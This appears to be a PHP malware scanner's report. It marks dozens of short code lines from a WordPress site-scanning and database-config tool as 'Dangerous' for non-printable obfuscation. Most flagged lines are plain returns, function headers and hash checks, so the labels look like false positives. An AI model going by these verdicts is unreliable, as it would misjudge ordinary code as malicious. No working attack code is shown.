<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ar</span><span style="color: #007700">!==</span><span style="color: #0000BB">$br</span><span style="color: #007700">?</span><span style="color: #0000BB">$ar</span><span style="color: #007700">-</span><span style="color: #0000BB">$br</span><span style="color: #007700">:</span><span style="color: #0000BB">strcmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">],</span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1549</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$sites</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_APP_PWD_CIPHER</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_sites_from_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$roots</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$raw </span><span style="color: #007700">!== </span><span style="color: #0000BB">false </span><span style="color: #007700">&& </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$raw</span><span style="color: #007700">) === </span><span style="color: #0000BB">32</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$raw </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ar</span><span style="color: #007700">!==</span><span style="color: #0000BB">$br</span><span style="color: #007700">?</span><span style="color: #0000BB">$ar</span><span style="color: #007700">-</span><span style="color: #0000BB">$br</span><span style="color: #007700">:</span><span style="color: #0000BB">strcmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_verify_password</span><span style="color: #007700">(</span><span style="color: #0000BB">$plain</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1581</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; '</span><span style="color: #007700">, </span><span style="color: #0000BB">$errors</span><span style="color: #007700">), </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1583</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'sites' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$sites</span><span style="color: #007700">, </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() ? </span><span style="color: #DD0000">'up_to_action' </span><span style="color: #007700">: </span><span style="color: #DD0000">'action'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">$expected</span><span style="color: #007700">, </span><span style="color: #0000BB">$actual</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1645</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cms_badge</span><span style="color: #007700">(</span><span style="color: #0000BB">$cms</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1646</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-wp'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-joo'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-lar'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-oc'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-empty'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1651</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-other'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 165</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash</span><span style="color: #007700">(</span><span style="color: #DD0000">'sha256'</span><span style="color: #007700">, </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() . </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">$sid </span><span style="color: #007700">. </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_is_authenticated</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'current_user_can'</span><span style="color: #007700">) && </span><span style="color: #0000BB">current_user_can</span><span style="color: #007700">(</span><span style="color: #DD0000">'manage_options'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 171</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">(), (string) </span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 173</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_login</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_logout</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_endpoint_url_value</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_fail_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1844</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin_url'</span><span style="color: #007700">) ? </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'tools.php?page=up-to-scanner'</span><span style="color: #007700">)) : </span><span style="color: #DD0000">'#'</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span>" target="_top">К плагину</a></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_render_login_page</span><span style="color: #007700">(</span><span style="color: #0000BB">$error </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_ENDPOINT_URL</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">, </span><span style="color: #0000BB">ENT_QUOTES</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_normalize_dir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uri </span><span style="color: #007700">!== </span><span style="color: #DD0000">'' </span><span style="color: #007700">? </span><span style="color: #0000BB">$uri </span><span style="color: #007700">: (isset(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_NAME'</span><span style="color: #007700">]) ? (string) </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_NAME'</span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fetch</span><span style="color: #007700">(</span><span style="color: #0000BB">APP_ENDPOINT_URL </span><span style="color: #007700">|| </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location</span><span style="color: #007700">.</span><span style="color: #0000BB">href</span><span style="color: #007700">, {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">r</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">text</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">t</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">JSON</span><span style="color: #007700">.</span><span style="color: #0000BB">parse</span><span style="color: #007700">(</span><span style="color: #0000BB">t</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggleConfigsPanel</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteShowDbInfo</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$real </span><span style="color: #007700">!== </span><span style="color: #0000BB">false</span><span style="color: #007700">) ? </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$real</span><span style="color: #007700">), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">) : </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2364</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbView</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2367</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteEditDbConfig</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_path_within_root</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$root</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteRenderDbPreview</span><span style="color: #007700">(</span><span style="color: #0000BB">fields</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2399</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteParseDbSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2408</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
